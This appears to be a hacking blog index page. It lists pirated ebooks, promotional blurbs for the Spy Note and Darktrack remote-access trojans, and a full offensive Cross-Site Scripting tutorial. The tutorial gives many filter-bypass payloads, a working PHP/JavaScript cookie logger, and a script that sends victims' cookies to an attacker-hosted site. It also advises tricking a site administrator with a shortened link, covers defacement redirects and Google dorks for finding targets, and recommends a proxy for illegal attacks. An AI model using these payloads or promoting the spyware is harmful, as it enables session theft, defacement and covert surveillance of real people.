  • Game Developer – Game Career Guide Fall 2008.pdf (30.82 MB)
  • Game.Design.pdf (381.85 KB)
  • GameArtForTeens.pdf (34.65 MB)
  • GameDevelopmentAndProduction.pdf (6.36 MB)
  • GameInterfaceDesign.pdf (6.46 MB)
  • Charles River Media Developing Serious Games 2006.chm (8.36 MB)
  • Chris Crawford Art of Computer Game Design.pdf (367.93 KB)
  • Chris Crawford on Game Design.chm (2.15 MB)
  • Cinematic Game Secrets for Creative Directors and 5. Producers.pdf (6.82 MB)
  • Course Technology PTR Game Character Design Complete Jun.2006.pdf (13.19 MB)
  • Creating Emotion In Games .chm (4.59 MB)
  • Designing Arcade Computer Game Graphics.pdf (5.33 MB)
  • A Theory Of Fun In Game Design.pdf (86.65 MB)
  • Andrew Rollings and Ernest Adams on Game Design (New Riders 2003).chm (8.43 MB)
  • Awesome Game Creation.pdf (20.28 MB)
  • Beginning Game Level Design.pdf (5.47 MB)
  • Beginning Illustration and Storyboarding for games.pdf (31.54 MB)
  • Character Development and Storytelling for Games.pdf (14.00 B)
  • Better Game Characters by Design a Psychological Approach the Morgan Kaufmann Series in interactive 3D Technology.pdf
Read More

PentestBox - Penetration Testing Environment for the Windows Operating System

, ,




Lời mở đầu

Đôi khi, bạn thấy có những công cụ bảo mật, quét lỗ hổng rất tuyệt vời cho đến khi bạn vào trang chủ để tải về thì bắt gặp dòng chữ "Windows is not supported"... Nhưng đừng buồn, vì bạn không phải là người duy nhất gặp vấn đề đó.
Read More

Java For Dummies - 6th Edition

,

DOWNLOAD
Read More

9 công cụ giúp giải mã dữ liệu bị mã hóa bởi ransomware

, ,


Nếu bạn đang tìm cách giải mã dữ liệu bị mã hóa bởi ransomware, đây là bài viết dành cho bạn. Chúng tôi không chắc bạn có thể giải mã được dữ liệu; nhưng ít ra những thông tin cung cấp trong bài viết có thể giúp bạn đi đúng hướng. Việc còn lại là trông chờ vào may mắn. Tất nhiên, bạn còn một phương án nữa: TRẢ TIỀN CHUỘC.
Read More

10 điều cần làm khi máy tính nhiễm ransomware

, ,



Nhiễm ransomware là tình huống rất nghiêm trọng; đặc biệt khi dữ liệu bị mã hóa là những dữ liệu quan trọng ảnh hưởng đến hoạt động công ty bạn. Tuy nhiên không hẳn đã hết hy vọng. Nếu có chút may mắn, bạn vẫn có thể giải mã dữ liệu. Bên cạnh đó, điều quan trọng không kém là bạn cần ngăn chặn để câu chuyện không trở nên nghiêm trọng hơn.
Read More

Spy Note v2 (Android RAT)

, ,

Spy Note is a free Android RAT with great features. Its similar to other Android RAT’s but it has more option and better stability.
Features:
-No root access required
-Bind SpyNote APK server with any other APP
-Install any APK and update server
-Copy files from device to computer
-View all message on the device
-Listen to call conversations made on the device
-View contacts
-Listen live or record audio from the device microphone
-View device location
-Builder
and more
Tutorial: 
Read More

Tấn công máy tính sử dụng Teensy HID - P1

,

Kỹ thuật tấn công máy tính sử dụng thiết bị HID đã xuất hiện trong nhiều năm trở lại đây, thiết bị HID là một phân lớp của tiêu chuẩn USB - thường được ứng dụng trong khá nhiều các thiết bị ngoại vi với hình dạng, kích thước và chức năng khác nhau. Trong bài viết này, tôi sẽ tiến hành thử nghiệm các lab sử dụng thiết bị Teensy HID phiên bản phần cứng 3.2 để khai thác, chiếm quyền máy tính và một số hình thức tấn công đa dạng khác.
HID (Human Interface Device): là một phân lớp (class) trong tiêu chuẩn USB. Một thiết bị HID có thể được lập trình để định nghĩa lại chức năng của nó. Thiết bị HID có thể là một bàn phím USB, chuột USB, thiết bị chơi game cầm tay, thiết bị lưu trữ dữ liệu, ...
Read More

Darktrack v4.0 Alien

, ,

DOWNLOAD
Read More

Basic Linux Command

,


Read More

Nội công - Khí công

,

DOWNLOAD
Read More

[Tutorial] Cross-Site Scripting [XSS]

, , ,

What is XSS?

XSS stands for Cross-Site-Scripting. It is basically an attack, that is used to execute HTML and Javascript on the web-page. This attack can be done by submitting queries into text-boxes, or even into the URL. The results come back reading the text as HTML, so it executes the scripts instead of displaying them in plain text. With an XSS attack, you can steal cookies from a Web-Administrator, or even use some social-engineering to manipulate someone into download a virus that you've created. Such as a Botnet, or RAT, maybe even a Keylogger. XSS can be very dangerous, but can also be very mild. Most of my attacks are mild XSS attacks, that can be difficult to use against a website. There are many ways to use XSS to your advantage. I will name a few examples. You can use an alert box to advertise yourself, or alert the web-admin that you've discovered a security breach involving XSS. You can also setup a Cookie-Stealer/Logger. Anything you can do with HTML, can be used against a site with this attack. I will explain some of the most important terms associated with XSS.

What is HTML and Javascript?

HTML
HTML is sort of like a programming language. The distinctions between a programming language, and HTML, are not too far apart. They are both languages, that are used to create attributes, and events. HTML is a markup language, which is used mostly to create websites. HTML stands for Hyper-Text Markup Language. You can use HTML to create forms, buttons, and other stuff that can be used in a webpage. I highly doubt you will ever encounter a website that does not contain even a slight amount of HTML. 

Javascript
Now, first, let's get one thing straight. There is a HUGE difference between JAVA and JAVASCRIPT. Java, is a language that ressembles to C++, it can be used in games, and applications. Javascript is sort of similar to HTML, but definitely different in many ways. Javascript isn't used NEARLY as much in Webpages than HTML is. Javascript is used, more in applications outside of webpages. Like PDFs. Javascript can be an incredibly useful language along with HTML. They are both fairly simple to learn, and are very dynamic.

XSS: My first attack.
Now, let's start getting into the really good stuff. In this section, I'll be explaining how to use XSS to your advantage. We will also be launching our very first attack with XSS, if you know the basics to XSS, you can skip this section, because I doubt you will learn anything that you don't briefly know yet. 

Now, our first step, is obviously to find a vulnerable site. Finding a site vulnerable to XSS is a lot easier than finding a site vulnerable to SQLi. The problem is, it can take time to determine whether the site is really vulnerable. With SQLi, you can just add a little '. But in XSS, you must submit (sometimes) multiple queries, to test your site for XSS. 

Most vulnerable sites will contain a Search, Login, or a Register area. Pretty much anywhere that contains a text-box, can be exploited with XSS. HOWEVER, many people forget this fact, and never use it to their full potential because they think it's useless. You can exploit XSS through the source aswell. You can't just take any script, and edit the full thing. But editing an "onmouseover" script, is definitely an exception. I will be explaining this method of XSS later on, for now, we need the complete basics. 

Anyways, our site should have some Text-Boxes to input some HTML in. I will simply be using a search bar.

So, lets try putting in the most known, BASIC query of all time. 
Code:
<script>alert("XSS")</script>

That little script, is HTML. It will make a little message pop up, saying "XSS". You can edit that part if you like. Just don't edit any other parts of the script. Put that into your search bar, and hit enter. Now, if a little alert box popped up, you've successfully attacked a site vulnerable to XSS! If no box popped up, that is alright, because that means the site has taken some time to put in a filter. A filter, is when we search something, then it goes through a mini process, basically an inspection. It checks for any malicious (dangerous) things. In this case, it will look for XSS. Sometimes, these filters are very weak, and can be by-passed very easily, other times, they can be quite difficult to bypass. There are a lot of ways to bypass an XSS filter. First, we have to find out what the filter is blocking. A lot of the time, it is blockin the alert. Here's an example of this kind of filter:

Code:
<script>alert("XSS")</script>
>
Code:
<script>alert( > XSS DETECTED < )</script>

It will block the quotes. So how the hell do we get passed that? Well, thankfully there's a way to encrypt the full message. We will be using a little function called "String.FromCharCode". The name of it pretty much explains it all. It encrypts our text, into ASCII. An example of this encryption, would be like this:

Code:
String.fromCharCode(88,83,83)

Yes, it can be a little bit confusing, but with a little bit of explaining, and testing, it is quite simple. Here is what our full query will look like:

Code:
<script>alert(String.fromCharCode(88,83,83))</script>

You do NOT need ANY quotes in the simple query like that. So lets put that back in the search bar, and voila! It worked! We got an alert box saying "XSS"! If you still didn't get any alert box, try some of these queries that I like to use:

Code:
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))

Yes, I just wrote all those down, and it took longer than it should've, but they all work in their own way, so try as many of them as you can. I've attacked some pretty huge sites with some of those queries. I create my own queries sometimes, you should create some too, they can come in handy a lot.

XSS: Advanced Methods

Now, in this section I will be sharing some ways to use XSS maliciously against a site. Now, keep in mind all malicious attacks sent over to a system, site, or server, is illegal and you CAN be prosecuted for these actions. So ALWAYS use protection if you're planning on doing something malicious to the site. If you want to make a little alert box pop up, you shouldn't need a Proxy/VPN.

Cookie Stealing/Logging
Now, cookie stealing is about the most malicious thing we can do with Non-Persistent XSS. A cookie stealer/logger, will log the cookies of the user who access the page to a certain document. The easiest way to do this, would be with a three step process.

First, you should setup a site. Personally, I find http://www.000webhost.com/ the best for upload malicious code, programs, or anything else. So go ahead and register there.

Now, once you've created your site, go to the file manager. Create a new file. Call it "CookieLog.txt". Leave the code blank. Now, create another file after that, called "CookieLogger.php". In CookieLogger.php, we need to add some code, so that it sends the cookies that we log, into our Cookie Log. Add this code, into it (Just make sure the file name has .php, or else it will not run the PHP code (Which is an enormous problem)). 

Code:
<?php
/*
* Created on 16. april. 2007
* Created by Audun Larsen (audun@munio.no)
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

if(strlen($_SERVER['QUERY_STRING']) > 0) {
   $fp=fopen('./CookieLog.txt', 'a');
   fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
   fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

// ==
//  URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
//  web site you include a credit somewhere on the web site
//  with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
   // The Javascript escape and unescape functions do not correspond
   // with what browsers actually do...
   var SAFECHARS = "0123456789" +  // Numeric
 "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic
 "abcdefghijklmnopqrstuvwxyz" +
 "-_.!~*'()";  // RFC2396 Mark characters
   var HEX = "0123456789ABCDEF";

   var plaintext = str;
   var encoded = "";
   for (var i = 0; i < plaintext.length; i++ ) {
 var ch = plaintext.charAt(i);
 if (ch == " ") {
   encoded += "+";    // x-www-urlencoded, rather than %20
 } else if (SAFECHARS.indexOf(ch) != -1) {
   encoded += ch;
 } else {
   var charCode = ch.charCodeAt(0);
   if (charCode > 255) {
   alert( "Unicode Character '"
   + ch
   + "' cannot be encoded using standard URL encoding.\n" +
   "(URL encoding only supports 8-bit characters.)\n" +
   "A space (+) will be substituted." );
   encoded += "+";
   } else {
   encoded += "%";
   encoded += HEX.charAt((charCode >> 4) & 0xF);
   encoded += HEX.charAt(charCode & 0xF);
   }
 }
   } // for

   return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

< ?php
}
?>

Now that we have our Cookie Logger script, we can send the cookie logger to our best friend, the Web-Admin . To do this, we should probably Tiny the URL. Or if you can figure out how to Spoof the URL, that will work too.

To Tiny the URL, go to http://www.tinyurl.com/ and just put in the URL. But hold one, we need to add a script into our XSS vulnerability. This is the script that will start our Cookie Logging.

Code:
<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>

So just add that script after the URL, then tiny it, and send it to our Web-Admin, now this can take some time for the Admin to actually click it. Sometimes, the Admin won't click it, so if it takes too long, you should just give up and find another way to exploit it. 

Once you get the cookie, you can use "Cookie Manager" Firefox addon to manipulate and edit the cookies so that you can hijack the administrators session. I find Cookie Manager a very useful app for XSS, make sure to download it.

Defacing
Defacing is one of the most common things people like to do when they have access to multiple administrator options. Mostly so that they can advertise themselves, and simply let the administrator know that their security has been breached. Anyways, defacing with XSS requires persistent XSS, maybe a comment box, or something. You can use this script to create a re-direct to your deface page (You should probably redirect it to your deface on Pastehtml.com, because it's anonymous uploading.)

Code:
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>


XSS: Onmouseover
Onmousover isn't a very exploitable vulnerability. But yet, it is still considered XSS. An onmouseover vulnerability would look something like this:

Code:
onmouseover=prompt1337

We can exploit this, by editing it to:

Code:
onmouseover=alert("XSS")

Very basic vulnerability, but it's getting more noticed, and patched in a lot more websites. Most sites will use Adobe Flash or CSS to do those kind of effects now. 

XSS Filter Bypassing Techniques
Sometimes a simple XSS query just won't do the trick. The reason your query isn't working, is because the website has a WAF or Filter set in place. A filter will block as many XSS and SQLi queries as possible. In this case, we're dealing with XSS.

There are many ways on bypassing XSS filters, but I will only explain a few.

Hex Bypassing
With blocked characters like >, <, and /, it is quite difficult to execute an XSS query. Not to worry, there's always a solution You can change your characters, into Hex. A Hex of a certain character, is basically the character, but in a different format. These should help you out:

> = %3c 
< = %3c 
/ = %2f 

ASCII Bypassing
With an ASCII encryption, we can use the character ". Which is blocked quite a bit. This is one of the most common XSS Filter bypasses of all time. A script that you would need to encrypt, would look like this:

NOT WORKING SCRIPT
Code:
<script>alert("XSS")</script>

WORKING SCRIPT
Code:
<script>alert(String.fromCharCode(88,83,83))</script>

To encrypt your little part of a script, go to this site: http://www.wocares.com/noquote.php I use that site, and find it quite useful.

Case-Sensitive Bypassing
This kind of bypass rarely works, but it's always worth a shot. Some filters are set in place to detect certain strings, however, the filter's strings that are blocked are CASE SENSITIVE. So all we need to do, is execute a script, with different sizes of characters. This bypass, would look like this:

Code:
<ScRiPt>aLeRt("XSS")</ScRiPt>

You can also mix that with ASCII encryption if you like. This kind of bypass only works on really stupid filters, or really REALLY old ones. 


Some XSS Dorks
It's usually best to create/find your own dorks, but in this tutorial, I'll write some up real quick to share:

Code:
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx

Those dorks are about as basic as they can get, sorry if they do not satisfy you. I rarely use dorks, and with this tutorial you shouldn't need to use dorks to find a vulnerable site. XSS is a very popular vulnerability. Even in google I found some. Some in HackForums too. XSS isn't a very high-priority, at least not Non-Persistent.
Read More
Subscribe to: Posts (Atom)

 
biz.